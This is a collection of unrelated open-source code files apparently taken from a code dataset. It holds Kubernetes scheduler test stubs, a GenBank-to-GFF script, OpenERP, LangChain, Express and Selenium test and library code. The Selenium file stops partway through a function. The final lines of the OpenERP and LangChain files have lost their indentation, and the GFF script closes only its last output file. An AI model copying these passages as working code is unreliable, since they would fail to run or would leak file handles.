					})
				}
				return actualPodNamesInWaitingPods
			}).WithTimeout(permitTimeout).Should(gomega.Equal(sets.New(tc.expectPodNamesInWaitingPods...)), "unexpected waitingPods in scheduler profile")
		})
	}
}
// Compile-time check that fakeQueueSortPlugin satisfies fwk.QueueSortPlugin.
var _ fwk.QueueSortPlugin = &fakeQueueSortPlugin{}

// fakeQueueSortPlugin is a stub QueueSort plugin whose ordering never prefers
// one pod over another, leaving the queue in insertion order.
type fakeQueueSortPlugin struct{}

// Name returns the name this plugin is registered under.
func (*fakeQueueSortPlugin) Name() string {
	return queueSort
}

// Less reports false for every pair of pods.
func (*fakeQueueSortPlugin) Less(_, _ fwk.QueuedPodInfo) bool {
	return false
}
// Compile-time check that fakebindPlugin satisfies fwk.BindPlugin.
var _ fwk.BindPlugin = &fakebindPlugin{}

// fakebindPlugin is a stub Bind plugin that reports success without doing any
// actual binding work.
type fakebindPlugin struct{}

// Name returns the name this plugin is registered under.
func (*fakebindPlugin) Name() string {
	return fakeBind
}

// Bind is a no-op; a nil status tells the framework the bind succeeded.
func (*fakebindPlugin) Bind(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ string) *fwk.Status {
	return nil
}
// filterWithoutEnqueueExtensionsPlugin implements Filter, but doesn't implement EnqueueExtensions.
// Tests use it to check how the framework treats plugins with no event registrations.
type filterWithoutEnqueueExtensionsPlugin struct{}

// Name returns the name this plugin is registered under.
func (*filterWithoutEnqueueExtensionsPlugin) Name() string { return filterWithoutEnqueueExtensions }

// Filter always accepts the node (nil status means success).
func (*filterWithoutEnqueueExtensionsPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}
// hintFromFakeNode is a sentinel QueueingHint value so tests can assert that
// fakeNodePlugin's hint function was the one invoked.
var hintFromFakeNode = fwk.QueueingHint(100)

// fakeNodePlugin is a stub Filter plugin that registers interest in Node/Add
// events with a recognizable hint function.
type fakeNodePlugin struct{}

// fakeNodePluginQueueingFn always returns the fakeNode sentinel hint.
var fakeNodePluginQueueingFn = func(_ klog.Logger, _ *v1.Pod, _, _ interface{}) (fwk.QueueingHint, error) {
	return hintFromFakeNode, nil
}

func (*fakeNodePlugin) Name() string { return fakeNode }

// Filter always accepts the node (nil status means success).
func (*fakeNodePlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}

// EventsToRegister subscribes to Node/Add with the sentinel hint function.
func (pl *fakeNodePlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
	return []fwk.ClusterEventWithHint{
		{Event: fwk.ClusterEvent{Resource: fwk.Node, ActionType: fwk.Add}, QueueingHintFn: fakeNodePluginQueueingFn},
	}, nil
}

// hintFromFakePod is a sentinel QueueingHint value so tests can assert that
// fakePodPlugin's hint function was the one invoked.
var hintFromFakePod = fwk.QueueingHint(101)

// fakePodPlugin is a stub Filter plugin that registers interest in Pod/Add
// events with a recognizable hint function.
type fakePodPlugin struct{}

// fakePodPluginQueueingFn always returns the fakePod sentinel hint.
var fakePodPluginQueueingFn = func(_ klog.Logger, _ *v1.Pod, _, _ interface{}) (fwk.QueueingHint, error) {
	return hintFromFakePod, nil
}

func (*fakePodPlugin) Name() string { return fakePod }

// Filter always accepts the node (nil status means success).
func (*fakePodPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}

// EventsToRegister subscribes to Pod/Add with the sentinel hint function.
func (pl *fakePodPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
	return []fwk.ClusterEventWithHint{
		{Event: fwk.ClusterEvent{Resource: fwk.Pod, ActionType: fwk.Add}, QueueingHintFn: fakePodPluginQueueingFn},
	}, nil
}
// emptyEventPlugin implements EnqueueExtensions but returns a nil slice of
// events from EventsToRegister.
type emptyEventPlugin struct{}

func (*emptyEventPlugin) Name() string { return emptyEventExtensions }

// Filter always accepts the node (nil status means success).
func (*emptyEventPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}

// EventsToRegister registers no events and reports no error.
func (pl *emptyEventPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
	return nil, nil
}

// errorEventsToRegisterPlugin is a mock plugin that returns an error for EventsToRegister method
type errorEventsToRegisterPlugin struct{}

func (*errorEventsToRegisterPlugin) Name() string { return errorEventsToRegister }

// Filter always accepts the node (nil status means success).
func (*errorEventsToRegisterPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}

// EventsToRegister always fails, letting tests exercise the error path.
func (*errorEventsToRegisterPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
	return nil, errors.New("mock error")
}

// emptyEventsToRegisterPlugin implement interface fwk.EnqueueExtensions, but returns nil from EventsToRegister.
// This can simulate a plugin registered at scheduler setup, but does nothing
// due to some disabled feature gate.
type emptyEventsToRegisterPlugin struct{}

func (*emptyEventsToRegisterPlugin) Name() string { return emptyEventsToRegister }

// Filter always accepts the node (nil status means success).
func (*emptyEventsToRegisterPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
	return nil
}

// EventsToRegister registers no events and reports no error.
func (*emptyEventsToRegisterPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
	return nil, nil
}
// fakePermitPlugin only implements PermitPlugin interface.
// It parks every pod at the permit stage and broadcasts an event so tests can
// detect when a pod is waiting.
type fakePermitPlugin struct {
	eventRecorder events.EventRecorder
}

// newFakePermitPlugin returns a plugin factory that builds a fakePermitPlugin
// wired to the given event recorder.
func newFakePermitPlugin(eventRecorder events.EventRecorder) frameworkruntime.PluginFactory {
	return func(ctx context.Context, configuration runtime.Object, f fwk.Handle) (fwk.Plugin, error) {
		pl := &fakePermitPlugin{
			eventRecorder: eventRecorder,
		}
		return pl, nil
	}
}

func (f fakePermitPlugin) Name() string {
	return fakePermit
}

const (
	// podWaitingReason is the event reason emitted once a pod is parked at permit.
	podWaitingReason = "podWaiting"
	// permitTimeout bounds both how long pods wait and how long tests poll.
	permitTimeout = 10 * time.Second
)

// Permit returns a Wait status with permitTimeout, parking the pod, and emits
// a podWaiting event as it returns.
func (f fakePermitPlugin) Permit(ctx context.Context, state fwk.CycleState, p *v1.Pod, nodeName string) (*fwk.Status, time.Duration) {
	defer func() {
		// Send event with podWaiting reason to broadcast this pod is already waiting in the permit stage.
		f.eventRecorder.Eventf(p, nil, v1.EventTypeWarning, podWaitingReason, "", "")
	}()
	return fwk.NewStatus(fwk.Wait), permitTimeout
}
var _ fwk.PermitPlugin = &fakePermitPlugin{} | go | github | https://github.com/kubernetes/kubernetes | pkg/scheduler/scheduler_test.go |
###############################################################################
# kBaseGenbankToGFF.py
# Copyright (c) 2017, Joshua J Hamilton and Katherine D McMahon
# Affiliation: Department of Bacteriology
# University of Wisconsin-Madison, Madison, Wisconsin, USA
# URL: http://http://mcmahonlab.wisc.edu/
# All rights reserved.
################################################################################
# Convert Genbank files downloaded from KBase into GFF files.
################################################################################
#%%#############################################################################
### Import packages
################################################################################
from BCBio import GFF
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.SeqFeature import SeqFeature
import os
#%%#############################################################################
### Define folder structure
################################################################################
# Input (Genbank) and output (GFF) locations, relative to this script.
gbkDir = '../gbk'
gffDir = '../gff'

#%%#############################################################################
### Create list of genomes to process
################################################################################

# Basenames (extension stripped) of every Genbank file in gbkDir.
genomeList = [fileName.replace('.gbk', '')
              for fileName in os.listdir(gbkDir)
              if fileName.endswith('.gbk')]
#%%#############################################################################
### Convert Genbank files to GFF files
### These files are necessary for counting mapped readsconti
################################################################################
# seqid -- SeqRecord ID
# source -- Feature qualifier with key "source"
# type -- Feature type attribute
# start, end -- The Feature Location
# score -- Feature qualifier with key "score"
# strand -- Feature strand attribute
# phase -- Feature qualifier with key "phase"
for genome in genomeList:
    # Files are opened per genome; inFile is closed at the end of this loop
    # body and outFile is closed by the statement that follows the loop body.
    inFile = open(gbkDir+'/'+genome+'.gbk')
    outFile = open(gffDir+'/'+genome+'.gff', "w")

    for gbkRecord in SeqIO.parse(inFile, "genbank"):
        # Each Genbank record is an entire contig; walk its features and emit
        # one single-feature GFF record per feature of interest.
        for contigFeature in gbkRecord.features:
            # Fix: the original `else: next` branch was a bare name expression
            # (it referenced the `next` builtin without calling it) -- a no-op
            # that looked like flow control. Use an explicit guard instead.
            if contigFeature.type not in ('CDS', 'misc_RNA', 'tRNA'):
                continue

            gffRecord = SeqRecord(gbkRecord.seq, gbkRecord.id)
            # NOTE(review): assumes every CDS/misc_RNA/tRNA feature carries
            # 'gene' and 'function' qualifiers; a KeyError is raised otherwise.
            # Confirm against the KBase Genbank export format.
            gffQualifiers = {"source": "feature",
                             "ID": contigFeature.qualifiers['gene'],
                             "locus_tag": contigFeature.qualifiers['gene'],
                             "Product": contigFeature.qualifiers['function']}
            gffFeature = SeqFeature(contigFeature.location,
                                    type=contigFeature.type,
                                    qualifiers=gffQualifiers)
            gffRecord.features = [gffFeature]
            GFF.write([gffRecord], outFile)

    inFile.close()
outFile.close() | unknown | codeparrot/codeparrot-clean | ||
from openerp.tests.common import TransactionCase
class TestOnchangeProductId(TransactionCase):
    """Test that when an included tax is mapped by a fiscal position, the included tax must be
    subtracted to the price of the product.
    """

    def setUp(self):
        # Cache the model registries (old-style OpenERP ORM API) used by the test.
        super(TestOnchangeProductId, self).setUp()
        self.fiscal_position_model = self.registry('account.fiscal.position')
        self.fiscal_position_tax_model = self.registry('account.fiscal.position.tax')
        self.tax_model = self.registry('account.tax')
        self.pricelist_model = self.registry('product.pricelist')
        self.res_partner_model = self.registry('res.partner')
        self.product_tmpl_model = self.registry('product.template')
        self.product_model = self.registry('product.product')
        self.product_uom_model = self.registry('product.uom')
        self.so_line_model = self.registry('purchase.order.line')

    def test_onchange_product_id(self):
        # Fixtures: a 21% price-included tax mapped by a fiscal position onto a
        # 0% price-excluded tax, and a product listed at 121 (100 + 21% tax).
        cr, uid = self.cr, self.uid
        uom_id = self.product_uom_model.search(cr, uid, [('name', '=', 'Unit(s)')])[0]
        pricelist = self.pricelist_model.search(cr, uid, [('name', '=', 'Public Pricelist')])[0]
        partner_id = self.res_partner_model.create(cr, uid, dict(name="George"))
        tax_include_id = self.tax_model.create(cr, uid, dict(name="Include tax",
                                                             type='percent',
                                                             amount='0.21',
                                                             price_include=True))
        tax_exclude_id = self.tax_model.create(cr, uid, dict(name="Exclude tax",
                                                             type='percent',
                                                             amount='0.00'))
        product_tmpl_id = self.product_tmpl_model.create(cr, uid, dict(name="Voiture",
                                                                       list_price='121',
                                                                       supplier_taxes_id=[(6, 0, [tax_include_id])]))
        product_id = self.product_model.create(cr, uid, dict(product_tmpl_id=product_tmpl_id))
        fp_id = self.fiscal_position_model.create(cr, uid, dict(name="fiscal position",
                                                                sequence=1))
        fp_tax_id = self.fiscal_position_tax_model.create(cr, uid, dict(position_id=fp_id,
                                                                        tax_src_id=tax_include_id,
                                                                        tax_dest_id=tax_exclude_id))
        # Trigger the onchange: with the mapping applied, the included 21% tax
        # should be stripped from the 121 list price (assertion follows below).
        res = self.so_line_model.onchange_product_id(cr, uid, [], pricelist, product_id, 1.0, uom_id, partner_id,
                                                     fiscal_position_id=fp_id)
self.assertEquals(100, res['value']['price_unit'], "The included tax must be subtracted to the price") | unknown | codeparrot/codeparrot-clean | ||
"""Question-answering with sources over an index."""
from typing import Any
from langchain_core.callbacks import (
AsyncCallbackManagerForChainRun,
CallbackManagerForChainRun,
)
from langchain_core.documents import Document
from langchain_core.retrievers import BaseRetriever
from pydantic import Field
from langchain_classic.chains.combine_documents.stuff import StuffDocumentsChain
from langchain_classic.chains.qa_with_sources.base import BaseQAWithSourcesChain
class RetrievalQAWithSourcesChain(BaseQAWithSourcesChain):
    """Question-answering with sources over an index."""

    retriever: BaseRetriever = Field(exclude=True)
    """Index to connect to."""
    reduce_k_below_max_tokens: bool = False
    """Reduce the number of results to return from store based on tokens limit"""
    max_tokens_limit: int = 3375
    """Restrict the docs to return from store based on tokens,
    enforced only for StuffDocumentChain and if reduce_k_below_max_tokens is to true"""

    def _reduce_tokens_below_limit(self, docs: list[Document]) -> list[Document]:
        # Drop trailing documents until the combined token count fits within
        # max_tokens_limit. Only applies when the flag is set and the combine
        # chain is a StuffDocumentsChain (the chain that stuffs every document
        # into a single prompt).
        keep = len(docs)
        if self.reduce_k_below_max_tokens and isinstance(
            self.combine_documents_chain,
            StuffDocumentsChain,
        ):
            llm_chain = self.combine_documents_chain.llm_chain
            doc_tokens = [
                llm_chain._get_num_tokens(doc.page_content)  # noqa: SLF001
                for doc in docs
            ]
            total = sum(doc_tokens[:keep])
            while total > self.max_tokens_limit:
                keep -= 1
                total -= doc_tokens[keep]
        return docs[:keep]

    def _get_docs(
        self,
        inputs: dict[str, Any],
        *,
        run_manager: CallbackManagerForChainRun,
    ) -> list[Document]:
        # Retrieve documents for the question (forwarding callbacks to the
        # retriever), then enforce the token budget.
        retrieved = self.retriever.invoke(
            inputs[self.question_key],
            config={"callbacks": run_manager.get_child()},
        )
        return self._reduce_tokens_below_limit(retrieved)

    async def _aget_docs(
        self,
        inputs: dict[str, Any],
        *,
        run_manager: AsyncCallbackManagerForChainRun,
    ) -> list[Document]:
        # Async counterpart of _get_docs.
        retrieved = await self.retriever.ainvoke(
            inputs[self.question_key],
            config={"callbacks": run_manager.get_child()},
        )
        return self._reduce_tokens_below_limit(retrieved)
@property
def _chain_type(self) -> str:
"""Return the chain type."""
return "retrieval_qa_with_sources_chain" | python | github | https://github.com/langchain-ai/langchain | libs/langchain/langchain_classic/chains/qa_with_sources/retrieval.py |
// Acceptance tests for the route-separation example app: exercises the index
// page, user listing/viewing/editing (including PUT via the _method override),
// and the posts listing.
var app = require('../../examples/route-separation')
var request = require('supertest')

describe('route-separation', function () {
  describe('GET /', function () {
    it('should respond with index', function (done) {
      request(app)
        .get('/')
        .expect(200, /Route Separation Example/, done)
    })
  })

  describe('GET /users', function () {
    it('should list users', function (done) {
      request(app)
        .get('/users')
        .expect(/TJ/)
        .expect(/Tobi/)
        .expect(200, done)
    })
  })

  describe('GET /user/:id', function () {
    it('should get a user', function (done) {
      request(app)
        .get('/user/0')
        .expect(200, /Viewing user TJ/, done)
    })

    it('should 404 on missing user', function (done) {
      request(app)
        .get('/user/10')
        .expect(404, done)
    })
  })

  describe('GET /user/:id/view', function () {
    it('should get a user', function (done) {
      request(app)
        .get('/user/0/view')
        .expect(200, /Viewing user TJ/, done)
    })

    it('should 404 on missing user', function (done) {
      request(app)
        .get('/user/10/view')
        .expect(404, done)
    })
  })

  describe('GET /user/:id/edit', function () {
    it('should get a user to edit', function (done) {
      request(app)
        .get('/user/0/edit')
        .expect(200, /Editing user TJ/, done)
    })
  })

  describe('PUT /user/:id/edit', function () {
    it('should edit a user', function (done) {
      request(app)
        .put('/user/0/edit')
        .set('Content-Type', 'application/x-www-form-urlencoded')
        .send({ user: { name: 'TJ', email: 'tj-invalid@vision-media.ca' } })
        .expect(302, function (err) {
          if (err) return done(err)
          // Follow up with a GET to confirm the edit was persisted.
          request(app)
            .get('/user/0')
            .expect(200, /tj-invalid@vision-media\.ca/, done)
        })
    })
  })

  describe('POST /user/:id/edit?_method=PUT', function () {
    // Exercises method-override: a POST carrying _method=PUT should behave
    // exactly like the PUT route above.
    it('should edit a user', function (done) {
      request(app)
        .post('/user/1/edit?_method=PUT')
        .set('Content-Type', 'application/x-www-form-urlencoded')
        .send({ user: { name: 'Tobi', email: 'tobi-invalid@vision-media.ca' } })
        .expect(302, function (err) {
          if (err) return done(err)
          request(app)
            .get('/user/1')
            .expect(200, /tobi-invalid@vision-media\.ca/, done)
        })
    })
  })

  describe('GET /posts', function () {
    it('should get a list of posts', function (done) {
      request(app)
        .get('/posts')
        .expect(200, /Posts/, done)
    })
  })
}) | javascript | github | https://github.com/expressjs/express | test/acceptance/route-separation.js |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.common.exceptions import (
NoSuchElementException,
NoSuchFrameException,
WebDriverException)
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# ----------------------------------------------------------------------------------------------
#
# Tests that WebDriver doesn't do anything fishy when it navigates to a page with frames.
#
# ----------------------------------------------------------------------------------------------
@pytest.fixture(autouse=True)
def restore_default_context(driver):
    # Run the test, then always return to the top-level browsing context so a
    # failing test cannot leave a frame selected for the next one.
    yield
    driver.switch_to.default_content()


def testShouldAlwaysFocusOnTheTopMostFrameAfterANavigationEvent(driver, pages):
    pages.load("frameset.html")
    driver.find_element(By.TAG_NAME, "frameset")  # Test passes if this does not throw.


def testShouldNotAutomaticallySwitchFocusToAnIFrameWhenAPageContainingThemIsLoaded(driver, pages):
    # The heading lives in the top-level document, not inside any iframe.
    pages.load("iframes.html")
    driver.find_element(By.ID, "iframe_page_heading")


def testShouldOpenPageWithBrokenFrameset(driver, pages):
    pages.load("framesetPage3.html")
    frame1 = driver.find_element(By.ID, "first")
    driver.switch_to.frame(frame1)
    driver.switch_to.default_content()
    frame2 = driver.find_element(By.ID, "second")
    driver.switch_to.frame(frame2)  # IE9 can not switch to this broken frame - it has no window.
# ----------------------------------------------------------------------------------------------
#
# Tests that WebDriver can switch to frames as expected.
#
# ----------------------------------------------------------------------------------------------
def testShouldBeAbleToSwitchToAFrameByItsIndex(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame(1)
    assert driver.find_element(By.ID, "pageNumber").text == "2"


def testShouldBeAbleToSwitchToAnIframeByItsIndex(driver, pages):
    pages.load("iframes.html")
    driver.switch_to.frame(0)
    assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"


def testShouldBeAbleToSwitchToAFrameByItsName(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame("fourth")
    assert driver.find_element(By.TAG_NAME, "frame").get_attribute("name") == "child1"


def testShouldBeAbleToSwitchToAnIframeByItsName(driver, pages):
    pages.load("iframes.html")
    driver.switch_to.frame("iframe1-name")
    assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"


def testShouldBeAbleToSwitchToAFrameByItsID(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame("fifth")
    assert driver.find_element(By.NAME, "windowOne").text == "Open new window"


def testShouldBeAbleToSwitchToAnIframeByItsID(driver, pages):
    pages.load("iframes.html")
    driver.switch_to.frame("iframe1")
    assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"


def testShouldBeAbleToSwitchToFrameWithNameContainingDot(driver, pages):
    # A dot in the frame name must not be treated as a hierarchy separator.
    pages.load("frameset.html")
    driver.switch_to.frame("sixth.iframe1")
    assert "Page number 3" in driver.find_element(By.TAG_NAME, "body").text


def testShouldBeAbleToSwitchToAFrameUsingAPreviouslyLocatedWebElement(driver, pages):
    pages.load("frameset.html")
    frame = driver.find_element(By.TAG_NAME, "frame")
    driver.switch_to.frame(frame)
    assert driver.find_element(By.ID, "pageNumber").text == "1"


def testShouldBeAbleToSwitchToAnIFrameUsingAPreviouslyLocatedWebElement(driver, pages):
    pages.load("iframes.html")
    frame = driver.find_element(By.TAG_NAME, "iframe")
    driver.switch_to.frame(frame)
    element = driver.find_element(By.NAME, "id-name1")
    assert element.get_attribute("value") == "name"


def testShouldEnsureElementIsAFrameBeforeSwitching(driver, pages):
    # Passing a non-frame element (the frameset itself) must be rejected.
    pages.load("frameset.html")
    frame = driver.find_element(By.TAG_NAME, "frameset")
    with pytest.raises(NoSuchFrameException):
        driver.switch_to.frame(frame)


def testFrameSearchesShouldBeRelativeToTheCurrentlySelectedFrame(driver, pages):
    # Frame lookups are scoped to the currently selected frame, so sibling
    # frames are only reachable after returning to the default content.
    pages.load("frameset.html")
    driver.switch_to.frame("second")
    assert driver.find_element(By.ID, "pageNumber").text == "2"

    with pytest.raises(NoSuchElementException):
        driver.switch_to.frame(driver.find_element_by_name("third"))

    driver.switch_to.default_content()
    driver.switch_to.frame(driver.find_element_by_name("third"))

    with pytest.raises(NoSuchFrameException):
        driver.switch_to.frame("second")

    driver.switch_to.default_content()
    driver.switch_to.frame(driver.find_element_by_name("second"))
    assert driver.find_element(By.ID, "pageNumber").text == "2"


def testShouldSelectChildFramesByChainedCalls(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame(driver.find_element_by_name("fourth"))
    driver.switch_to.frame(driver.find_element_by_name("child2"))
    assert driver.find_element(By.ID, "pageNumber").text == "11"


def testShouldThrowFrameNotFoundExceptionLookingUpSubFramesWithSuperFrameNames(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame(driver.find_element_by_name("fourth"))

    with pytest.raises(NoSuchElementException):
        driver.switch_to.frame(driver.find_element_by_name("second"))


def testShouldThrowAnExceptionWhenAFrameCannotBeFound(driver, pages):
    pages.load("xhtmlTest.html")

    with pytest.raises(NoSuchElementException):
        driver.switch_to.frame(driver.find_element_by_name("Nothing here"))


def testShouldThrowAnExceptionWhenAFrameCannotBeFoundByIndex(driver, pages):
    pages.load("xhtmlTest.html")

    with pytest.raises(NoSuchFrameException):
        driver.switch_to.frame(27)
def testShouldBeAbleToSwitchToParentFrame(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame(driver.find_element_by_name("fourth"))
    driver.switch_to.parent_frame()
    # Back at the top level, a sibling frame is reachable again.
    driver.switch_to.frame(driver.find_element_by_name("first"))
    assert driver.find_element(By.ID, "pageNumber").text == "1"


def testShouldBeAbleToSwitchToParentFrameFromASecondLevelFrame(driver, pages):
    pages.load("frameset.html")
    driver.switch_to.frame(driver.find_element_by_name("fourth"))
    driver.switch_to.frame(driver.find_element_by_name("child1"))
    # parent_frame from a nested frame lands on "fourth", not default content.
    driver.switch_to.parent_frame()
    driver.switch_to.frame(driver.find_element_by_name("child2"))
    assert driver.find_element(By.ID, "pageNumber").text == "11"


def testSwitchingToParentFrameFromDefaultContextIsNoOp(driver, pages):
    pages.load("xhtmlTest.html")
    driver.switch_to.parent_frame()
    assert driver.title == "XHTML Test Page"


def testShouldBeAbleToSwitchToParentFromAnIframe(driver, pages):
    pages.load("iframes.html")
    driver.switch_to.frame(0)

    driver.switch_to.parent_frame()
    driver.find_element(By.ID, "iframe_page_heading")
# ----------------------------------------------------------------------------------------------
#
# General frame handling behavior tests
#
# ----------------------------------------------------------------------------------------------
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldContinueToReferToTheSameFrameOnceItHasBeenSelected(driver, pages):
    """The frame context must survive navigation triggered inside the frame."""
    pages.load("frameset.html")
    driver.switch_to.frame(2)
    checkbox = driver.find_element(By.XPATH, "//input[@name='checky']")
    checkbox.click()
    checkbox.submit()
    # TODO(simon): this should not be needed, and is only here because IE's submit returns too
    # soon.
    WebDriverWait(driver, 3).until(EC.text_to_be_present_in_element((By.XPATH, '//p'), 'Success!'))
@pytest.mark.xfail_marionette(raises=WebDriverException,
                              reason='https://github.com/mozilla/geckodriver/issues/610')
def testShouldFocusOnTheReplacementWhenAFrameFollowsALinkToA_TopTargetedPage(driver, pages):
    """A target=_top link inside a frame must refocus the driver on the new page."""
    pages.load("frameset.html")
    driver.switch_to.frame(0)
    driver.find_element(By.LINK_TEXT, "top").click()
    expectedTitle = "XHTML Test Page"
    # Wait for the top-level replacement page, then prove focus moved to it.
    WebDriverWait(driver, 3).until(EC.title_is(expectedTitle))
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "only-exists-on-xhtmltest")))
def testShouldAllowAUserToSwitchFromAnIframeBackToTheMainContentOfThePage(driver, pages):
    """default_content() returns from an iframe to the top-level document."""
    pages.load("iframes.html")
    driver.switch_to.frame(0)
    driver.switch_to.default_content()
    # Only present in the top-level document.
    driver.find_element(By.ID, "iframe_page_heading")


@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldAllowTheUserToSwitchToAnIFrameAndRemainFocusedOnIt(driver, pages):
    """Focus must remain inside the iframe after interacting with it."""
    pages.load("iframes.html")
    driver.switch_to.frame(0)
    driver.find_element(By.ID, "submitButton").click()
    assert getTextOfGreetingElement(driver) == "Success!"
def getTextOfGreetingElement(driver):
    """Wait (up to 3s) for the #greeting element and return its text."""
    return WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "greeting"))).text
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldBeAbleToClickInAFrame(driver, pages):
    """A click that replaces the frame's document must keep focus on the frame."""
    pages.load("frameset.html")
    driver.switch_to.frame("third")
    # This should replace frame "third" ...
    driver.find_element(By.ID, "submitButton").click()
    # driver should still be focused on frame "third" ...
    assert getTextOfGreetingElement(driver) == "Success!"
    # Make sure it was really frame "third" which was replaced ...
    driver.switch_to.default_content()
    driver.switch_to.frame("third")
    assert getTextOfGreetingElement(driver) == "Success!"
def testShouldBeAbleToClickInAFrameThatRewritesTopWindowLocation(driver, pages):
    """Clicking a frame button that rewrites window.top.location must navigate."""
    pages.load("click_tests/issue5237.html")
    # find_element_by_id() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.ID, "search"))
    driver.find_element(By.ID, "submit").click()
    driver.switch_to.default_content()
    WebDriverWait(driver, 3).until(EC.title_is("Target page for issue 5237"))
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldBeAbleToClickInASubFrame(driver, pages):
    """Focus stays on a nested frame after a click replaces its content."""
    pages.load("frameset.html")
    # find_element_by_id() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.ID, "sixth"))
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    # This should replace frame "iframe1" inside frame "sixth" ...
    driver.find_element(By.ID, "submitButton").click()
    # driver should still be focused on frame "iframe1" inside frame "sixth" ...
    # BUG FIX: the original ``assert x, "Success!"`` used a comma, making
    # "Success!" a (useless) assertion message — the check could never fail.
    assert getTextOfGreetingElement(driver) == "Success!"
    # Make sure it was really frame "iframe1" inside frame "sixth" which was replaced ...
    driver.switch_to.default_content()
    driver.switch_to.frame(driver.find_element(By.ID, "sixth"))
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    assert driver.find_element(By.ID, "greeting").text == "Success!"
def testShouldBeAbleToFindElementsInIframesByXPath(driver, pages):
    """XPath lookups must be scoped to the currently selected iframe."""
    pages.load("iframes.html")
    # find_element_by_id() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    element = driver.find_element(By.XPATH, "//*[@id = 'changeme']")
    assert element is not None


def testGetCurrentUrlReturnsTopLevelBrowsingContextUrl(driver, pages):
    """current_url reports the top-level URL even when focused on a frame."""
    pages.load("frameset.html")
    assert "frameset.html" in driver.current_url
    driver.switch_to.frame(driver.find_element(By.NAME, "second"))
    assert "frameset.html" in driver.current_url


def testGetCurrentUrlReturnsTopLevelBrowsingContextUrlForIframes(driver, pages):
    """current_url reports the top-level URL even when focused on an iframe."""
    pages.load("iframes.html")
    assert "iframes.html" in driver.current_url
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    assert "iframes.html" in driver.current_url
def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUs(driver, pages):
    """Deleting the current frame must still allow escaping to the top context."""
    pages.load("frame_switching_tests/deletingFrame.html")
    # find_element_by_id() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    killIframe = driver.find_element(By.ID, "killIframe")
    killIframe.click()
    driver.switch_to.default_content()
    # Wait for the iframe to disappear, re-add it, and switch into the new one.
    WebDriverWait(driver, 3).until_not(
        EC.presence_of_element_located((By.ID, "iframe1")))
    addIFrame = driver.find_element(By.ID, "addBackFrame")
    addIFrame.click()
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "iframe1")))
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))
def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUsWithFrameIndex(driver, pages):
    """Frame deletion/recovery scenario, locating the frame by numeric index."""
    pages.load("frame_switching_tests/deletingFrame.html")
    iframe = 0
    WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
    # we should be in the frame now
    killIframe = driver.find_element(By.ID, "killIframe")
    killIframe.click()
    driver.switch_to.default_content()
    addIFrame = driver.find_element(By.ID, "addBackFrame")
    addIFrame.click()
    WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))


def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUsWithWebelement(driver, pages):
